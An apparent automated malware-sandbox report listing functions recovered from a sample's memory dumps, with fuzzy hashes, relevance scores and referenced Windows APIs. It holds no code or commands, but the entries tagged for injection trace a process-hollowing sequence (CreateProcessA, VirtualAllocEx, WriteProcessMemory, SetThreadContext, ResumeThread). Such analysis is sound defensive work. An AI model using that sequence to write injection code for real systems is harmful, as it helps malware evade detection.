Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: BJ<z
API String ID: 0-2927076961
Opcode ID: 11276a356931743a54390f43bf54600cb4b3aceb8ebdaafaf43e0945cf3a32fd
Instruction ID: 45d1d117af0bd3f6cb52a883ea2a85aa5f8930182474c915ce1d1ef3a2c5bc91
Opcode Fuzzy Hash: 11276a356931743a54390f43bf54600cb4b3aceb8ebdaafaf43e0945cf3a32fd
Instruction Fuzzy Hash: B1A13670E052599BCB08CFAAC5845DEFBF2BF88310F258569D409AB315E7389981CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0C141CB7, Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

Sxd, xrefs: 0C141D19

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: Sxd
API String ID: 0-2849041667
Opcode ID: 547639d44f74c530406e9ecc689b6b98c0de620f712b23c5787d3723452f1abd
Instruction ID: 0c831f84c02ae23a3314fdbf81dcfc02409e8edab6a1e6f38ddb214b2c0d625a
Opcode Fuzzy Hash: 547639d44f74c530406e9ecc689b6b98c0de620f712b23c5787d3723452f1abd
Instruction Fuzzy Hash: 0C71A174E0521A9FCF08CFE9D5856AEFBF2AF88310F25C426D514B7259D33899818FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C141CC8, Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

Sxd, xrefs: 0C141D19

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: Sxd
API String ID: 0-2849041667
Opcode ID: 8ed0c4eea6b39ae4ca89ea1026e18ea7a93ca8c4ecce553c6bb94c36039296ae
Instruction ID: 3cf5dc077ad05cdd0f35656959d2d671e530e30f2ca6601cf183895acddbd7c4
Opcode Fuzzy Hash: 8ed0c4eea6b39ae4ca89ea1026e18ea7a93ca8c4ecce553c6bb94c36039296ae
Instruction Fuzzy Hash: F4616074E0521A9FCF08CFE9D5856AEFBF2AF88314F21D425D514B7258D3349A818FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C148B30, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fe68320404bfb8ee830e63d9edf553967d6e418824a7667b21bf18c67edd25
Instruction ID: 4237993607b332b0ce5f00a1f8d83b46c2928f636f03c8df6f1bf981b6799192
Opcode Fuzzy Hash: 81fe68320404bfb8ee830e63d9edf553967d6e418824a7667b21bf18c67edd25
Instruction Fuzzy Hash: 75C19E717027048FEB29DB76C490BAEB7F6AF89600F24446DD246DB6D0DB35E902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0C146484, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5a261219a5234c5302d5b60f1e3ee681a5d5369855ad5d99628b0178a524b4
Instruction ID: 73a81cc39dd2583d3635972c5e014bfdb81a80a4f4b315ba09a5f545a2bd69ba
Opcode Fuzzy Hash: fb5a261219a5234c5302d5b60f1e3ee681a5d5369855ad5d99628b0178a524b4
Instruction Fuzzy Hash: 2D513771E1422ACFDB64CF65C980BEDBBB2BB89300F1495EAD409A7240E7349AD5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0C1482B8, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9962630f9544bd8d7ae949296ecccfc879bd7a5ad4ef0bc6f11fb61ba4902c04
Instruction ID: ed4a3d91f6ca957e8168c3b874ddf5792dd55a84e17048022b041ab72956331a
Opcode Fuzzy Hash: 9962630f9544bd8d7ae949296ecccfc879bd7a5ad4ef0bc6f11fb61ba4902c04
Instruction Fuzzy Hash: B7319430E0A219DFEB18CFA9D9546FEBBF6AB4A254F119426D406F32C0D734C941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0C1482B3, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027cf8f1cca447fbc3b3cdc3bb3d78d5324a71c8471d11c522d9174ff06a8664
Instruction ID: 2116a796d57eb42fbc1fc96a917302bce13d007850661a4f6f83b3b3af4dce08
Opcode Fuzzy Hash: 027cf8f1cca447fbc3b3cdc3bb3d78d5324a71c8471d11c522d9174ff06a8664
Instruction Fuzzy Hash: BF317C70E0A219EFEB19CFA5D9546FDBAF6BB0A204F119526E406F3280D738C941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0C1483E4, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4fa1db896657949a5c5a0aee96365fd4c100cee5e36765bb57af39b100d907
Instruction ID: ad2fb5dda23a2547fd8f672618e96e7dfbe1364d2567be059bf85f9899723e33
Opcode Fuzzy Hash: ad4fa1db896657949a5c5a0aee96365fd4c100cee5e36765bb57af39b100d907
Instruction Fuzzy Hash: 5601A270E49249DFE7158FA0DC549BEBBB2BB07644F019159E042F72D1D778C506CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0C144B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0C144D96

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cc9f69fe0995c1f17c50a4f69d0d000147e703c56a97a8a0d62a0c14ee5b9902
Instruction ID: e663abf53f9f744a2d038d89889363f45b741b547fce77e7f68939b0fc0c8c73
Opcode Fuzzy Hash: cc9f69fe0995c1f17c50a4f69d0d000147e703c56a97a8a0d62a0c14ee5b9902
Instruction Fuzzy Hash: D1915A71E00219CFEB20CFA4C881BEDBBB2BF88314F158569D849B7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0C144B60, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0C144D96

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 134f485c4b23b28a38df3d131759469934fe01b79b2eae907f8c082cb6ede6c3
Instruction ID: bf6ea8faeed756b50aa479c79c14e5459051c4d468cad4c2341cd3ef4b3f6549
Opcode Fuzzy Hash: 134f485c4b23b28a38df3d131759469934fe01b79b2eae907f8c082cb6ede6c3
Instruction Fuzzy Hash: C1915B71E01219DFDB20CFA5C881BEDBBB2BF88314F158569D849B7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 033BBA60, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b07ca569609b89cebc6fbfc3be5ffb407374c96554718472f8d503bb184f9141
Instruction ID: 1e3add270c3a14174820a36d278d10efd753fe745fb3819c1e42a0484c32fa55
Opcode Fuzzy Hash: b07ca569609b89cebc6fbfc3be5ffb407374c96554718472f8d503bb184f9141
Instruction Fuzzy Hash: 2E712670A00B058FDB24DF2AD4907AAFBF5FF88214F04892DD58ADBA54DB75E8058F91

Uniqueness

Uniqueness Score: -1.00%

Function 033BAAB8, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b4647db3e93717d4988dba919718ccccd951db4f54ce7f9fc050ea68bfe89c
Instruction ID: ff1821d32242ad019b6d897de0682d493e9d95a955a24bb1140ab3dd98fa4a35
Opcode Fuzzy Hash: 44b4647db3e93717d4988dba919718ccccd951db4f54ce7f9fc050ea68bfe89c
Instruction Fuzzy Hash: 305103B1D04348EFDB14CF99D884ADEFBB5BF48314F24812AE509AB251D774A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 033BDF0D, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 033BE02A

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d3240d75f7e29192b4372faab64fe7ab58be77deefee9a113bb1b9b54ddc1eb9
Instruction ID: c05c808d4c9bc4fe6515cdadf2c90a9c805fc9fe98a8708866590fbfa1b40bb4
Opcode Fuzzy Hash: d3240d75f7e29192b4372faab64fe7ab58be77deefee9a113bb1b9b54ddc1eb9
Instruction Fuzzy Hash: 5051D3B1D04309DFDB14CF9AD884ADEFBB5BF48314F24822AE919AB210D774A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 033BAAD4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 033BE02A

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6e9097d4cd72cc9c69a604bbb3aa765c26dc358e1ad10ef3c33fc423605196b9
Instruction ID: 5187d8db9f85c040d762b00a52040f6eb43a45f7c5c94bcf92c6eb24b2674504
Opcode Fuzzy Hash: 6e9097d4cd72cc9c69a604bbb3aa765c26dc358e1ad10ef3c33fc423605196b9
Instruction Fuzzy Hash: 6951D2B1D04309DFDB14CF9AD884ADEFBB5BF48314F24822AE519AB210D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 033B7009, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,033B7046,?,?,?,?,?), ref: 033B7107

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 41b699157bf15b15538feda8ef6aab634d90532262c1995dc324598f1b4bfb4c
Instruction ID: 819589df2d0a7abbeb201952a4917396b32589973a08de9cbe3dcbed3b58c4df
Opcode Fuzzy Hash: 41b699157bf15b15538feda8ef6aab634d90532262c1995dc324598f1b4bfb4c
Instruction Fuzzy Hash: 6A414976900259AFCB11CF99D884AEEBFF5FF88310F15801AE905A7361C335A915DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0C1448D8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0C144968

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 40b4f979bea2e1d403a7ab8325c9b61713c7f6de84d5cdff7048e1e1bdc5e563
Instruction ID: abfe3b121085c051cef5221cd31d9cac5905cba3648403389a899e52a74f1818
Opcode Fuzzy Hash: 40b4f979bea2e1d403a7ab8325c9b61713c7f6de84d5cdff7048e1e1bdc5e563
Instruction Fuzzy Hash: F02115719043599FCB10CFA9C884BEEBBF5FB88314F50842AE918A7240D778A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0C1448D5, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0C144968

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 418c00b1689e10cf49db32f41bbb0ed74706550c1bfea7c0537bf45b5feb2298
Instruction ID: f22561f75fc9b0c37a8fb09327f208594fa2879ba6a0843b19a12c861db8da5d
Opcode Fuzzy Hash: 418c00b1689e10cf49db32f41bbb0ed74706550c1bfea7c0537bf45b5feb2298
Instruction Fuzzy Hash: 452124B6900359DFCF10CFA9C9847EEBBF1BF88314F14842AE919A7640D7789945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 033B7078, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,033B7046,?,?,?,?,?), ref: 033B7107

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 07be040c3b4d0413aae3c4525eb3ba89496b5dbbd3044e1f1f6355738168bea3
Instruction ID: bea93d15a19f3bc01296fb578bc3a808ded24ecaf11a2de72d1bd267924b303c
Opcode Fuzzy Hash: 07be040c3b4d0413aae3c4525eb3ba89496b5dbbd3044e1f1f6355738168bea3
Instruction Fuzzy Hash: A22103B5900208EFCB10CFAAD885AEEBBF4FF48324F14841AE914A7351D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C1449C4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0C144A48

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7d8c2a76f591056e7c8d082b85e40a2a2ad573209529b8fcd39c48f705045b35
Instruction ID: 68ccee8c09c8ba43a0ada174803dae06705716fb39e241a04f597f23c8e54bbe
Opcode Fuzzy Hash: 7d8c2a76f591056e7c8d082b85e40a2a2ad573209529b8fcd39c48f705045b35
Instruction Fuzzy Hash: B6214A719043599FCB10CFA9C8447EEBBF5FF88314F51842AE919A7240C7349905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0C144334, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0C1443B6

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: c2db90d4c1f3e5a0d4014a2d54b8b55ddd7dbcce939b18706605c6e1ca8aa93f
Instruction ID: 8fa67df754ef7a8d17bafba783f9e9744561bf3b140c450dc3b42562a8737dda
Opcode Fuzzy Hash: c2db90d4c1f3e5a0d4014a2d54b8b55ddd7dbcce939b18706605c6e1ca8aa93f
Instruction Fuzzy Hash: AA2168719043199FCB10CFAAC4847EEBBF5EF88324F55842AD859A7241CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 033B6C44, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,033B7046,?,?,?,?,?), ref: 033B7107

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f641def0473c6c26fef9c8fb0f4bef62a70d97df92923afab0b1aec4949c7a1a
Instruction ID: 65ad62ee83b3acf800d458d7516c75bc427400022e722a9b856264e5894ebd96
Opcode Fuzzy Hash: f641def0473c6c26fef9c8fb0f4bef62a70d97df92923afab0b1aec4949c7a1a
Instruction Fuzzy Hash: 5421D2B5904258AFDB10CF9AD884AEEBBF8FB48324F14841AE954A7750D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C1449C8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0C144A48

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 640c4d48fbfdc914f0375e652966fcda03848a849ef227ca43f50d86e08a9282
Instruction ID: 2b78ba1026db8ff5bd431132f56e58c0f50738570d73d7a013bef64b63d3b498
Opcode Fuzzy Hash: 640c4d48fbfdc914f0375e652966fcda03848a849ef227ca43f50d86e08a9282
Instruction Fuzzy Hash: 83212A719043599FCB10CFA9C8447EEBBF5FF48314F51842AD519A7240D7749945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C144338, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0C1443B6

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: ee1ec37cc42997b677ed2dd5d4f5a10e9b91cbcb9a5e957e190de4edf7098078
Instruction ID: 59ccf911e9c7ea4bdb5bd31442d40a1cc3d7391c5ab036ac7c3f8f8f74846522
Opcode Fuzzy Hash: ee1ec37cc42997b677ed2dd5d4f5a10e9b91cbcb9a5e957e190de4edf7098078
Instruction Fuzzy Hash: 4D2138719043198FCB10CFAAC4847EEBBF5AF88264F55842AD519A7240DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C144813, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0C144886

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b0c3c325867fb0db5eecc5a4f5edbc635a6eecff37a355b65513ca542d7f9355
Instruction ID: 616f4fdfe94099111963db4b5d66566a4ce9ca817ab326c029d1d1a0a6d204b8
Opcode Fuzzy Hash: b0c3c325867fb0db5eecc5a4f5edbc635a6eecff37a355b65513ca542d7f9355
Instruction Fuzzy Hash: 281156729043499FCF10CFAAD844BEEBBF5AB88324F15841AE919A7250C775A954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 033BA998, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,033BBD21,00000800,00000000,00000000), ref: 033BBF32

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 75307ed7c075caadcca9324b75cbb41b9fcb76e5a5426d296293ac35f6f38488
Instruction ID: 297af9945bc2bc45c31f568c26024723ab2223feda79f1f2adb730888cad7f8b
Opcode Fuzzy Hash: 75307ed7c075caadcca9324b75cbb41b9fcb76e5a5426d296293ac35f6f38488
Instruction Fuzzy Hash: 211114B69042089FCB10CF9AD884BEEFBF4EB88364F04852AE515A7640C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 033BBEC0, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,033BBD21,00000800,00000000,00000000), ref: 033BBF32

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d4b58b4ad5297b671fdb45a4da96eb13fa510368712fb4824fdb53d53bcd127
Instruction ID: f783a66c949ad224fb4f3bb74056d6a8586512dd3a21bb79d8d2505a0533af3d
Opcode Fuzzy Hash: 2d4b58b4ad5297b671fdb45a4da96eb13fa510368712fb4824fdb53d53bcd127
Instruction Fuzzy Hash: 102114B6D042099FCB10CFAAD888BEEFBF4FB88314F15851AE515A7600C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C144818, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0C144886

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 39a01ee0c90003a023f4269af5f31dbdc17c55da79b120c921823009e2049fe5
Instruction ID: 1fb43414a273077241e90e5c33243e58d7a10237fb9bec45c610213e4ab28b57
Opcode Fuzzy Hash: 39a01ee0c90003a023f4269af5f31dbdc17c55da79b120c921823009e2049fe5
Instruction Fuzzy Hash: 721156719043499FCB10CFAAC844BEEBBF5AB88324F14841AD519A7250C775A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0C144284, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0C1442EA

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0934efb600b9320d0372b893f9a330fcbcc51354bd38a6ab2a5bc4999fb27831
Instruction ID: 0e365876ff133f7ebc25ce502d5b3d3312eba76c80bd7afb526ad8cce91ca055
Opcode Fuzzy Hash: 0934efb600b9320d0372b893f9a330fcbcc51354bd38a6ab2a5bc4999fb27831
Instruction Fuzzy Hash: 58116DB59043488FCB10CFAAD8447EEFBF5AB88224F158419D519A7640C774A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 033BA944, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,033BBA73), ref: 033BBCA6

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8df089e0c6ca655658a9d4e3d5ae77cb0f55292e5e6a5927ea910013642da6ee
Instruction ID: cc1b58adfabd79b5b1632149a8e9d8f3c3089fb7910c3f4bf0bdb84745fcf81a
Opcode Fuzzy Hash: 8df089e0c6ca655658a9d4e3d5ae77cb0f55292e5e6a5927ea910013642da6ee
Instruction Fuzzy Hash: 5C1104B5D046498FCB10CF9AD844BDEFBF8EB88224F14841AD919B7600D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0C144288, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0C1442EA

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d12e6f7c328959354e6afaace626730ed48734d06170a6dc712a14ba1296f804
Instruction ID: 624a47c1d195b6699cd653e091b44548f3b317694b3c9b876fdbf0be64842978
Opcode Fuzzy Hash: d12e6f7c328959354e6afaace626730ed48734d06170a6dc712a14ba1296f804
Instruction Fuzzy Hash: 04113AB19043488FCB20DFAAD8447EEFBF5AB88228F25841AC519A7640C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0C144460, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0C147E25

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 430422448a00921a0a65347e5191bc1b579a61887084cd1d0ca589b919f4f94e
Instruction ID: 98192d19231883da4be4ddcf34e5d1709f74348b92fd1f44deb8f7cc06f6ead4
Opcode Fuzzy Hash: 430422448a00921a0a65347e5191bc1b579a61887084cd1d0ca589b919f4f94e
Instruction Fuzzy Hash: 2E11B0B59042499FDB20CF99D888BEEBBF8EB58324F10841AE915A7640D374A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 033BDB34, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,033BE148,?,?,?,?), ref: 033BE1BD

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d3ac21f72be52e3ecd3b6a54346e6a4828b3fb58822fa3979f33118a042b459c
Instruction ID: 088bb4edb3a7c9bcaae173f2c23c9b9971672d6ce9036450e8755e7141913fa8
Opcode Fuzzy Hash: d3ac21f72be52e3ecd3b6a54346e6a4828b3fb58822fa3979f33118a042b459c
Instruction Fuzzy Hash: 3C11F5B59042089FDB10CF99D888BEEFBF8EB48324F10841AE915A7740C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 033BE159, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,033BE148,?,?,?,?), ref: 033BE1BD

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8b46722622d4604d5e088c5abfacb8299982de2841cd32586297de9ab8b52189
Instruction ID: 9dee7ef6f28f3f05daca985ba0703dba4840f9ea86f2105073d5d00d23b6e5d2
Opcode Fuzzy Hash: 8b46722622d4604d5e088c5abfacb8299982de2841cd32586297de9ab8b52189
Instruction Fuzzy Hash: 4F1106B5900248DFDB10CF99D884BEEFBF4EB88324F24851AD919A7740C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C147DC4, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0C147E25

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9d458d115a1670cc09a36890011f1314659e6ef06b761fec0d49cfc915cb6597
Instruction ID: 4e5df8f6547fb758edaa5a473943df89bfe10a175d4170e65b9bfb07ab7789f0
Opcode Fuzzy Hash: 9d458d115a1670cc09a36890011f1314659e6ef06b761fec0d49cfc915cb6597
Instruction Fuzzy Hash: 1A1103B59042499FCB20CF99D888BEEFFF8EB48324F10841AD954A7240C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0157D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245125330.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857c6ca261d6254805656597cdd8664e050def9f6639ff53327fb3764d430f74
Instruction ID: 114889b1a11928427c252ddcbab5e7787d87e71c672d3d3098071dac7b197cdd
Opcode Fuzzy Hash: 857c6ca261d6254805656597cdd8664e050def9f6639ff53327fb3764d430f74
Instruction Fuzzy Hash: 622103B1504240DFDB05CF94E9C1B2ABFB5FF88328F248569E9094F246C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0158D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245210834.000000000158D000.00000040.00000001.sdmp, Offset: 0158D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09fdc60dc7349fba3dbcb7dd21c112153d23843ce86a9e484fa8c8b201cfb822
Instruction ID: d5036a87aaebb895addd4f6da3b735e8d74f52613909ba07b05addb8367176e7
Opcode Fuzzy Hash: 09fdc60dc7349fba3dbcb7dd21c112153d23843ce86a9e484fa8c8b201cfb822
Instruction Fuzzy Hash: 8521F175608244DFDB15EF94D8C0B26BBF1FB88254F20C969D9495F286D33AD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0158D006, Relevance: .1, Instructions: 62COMMON

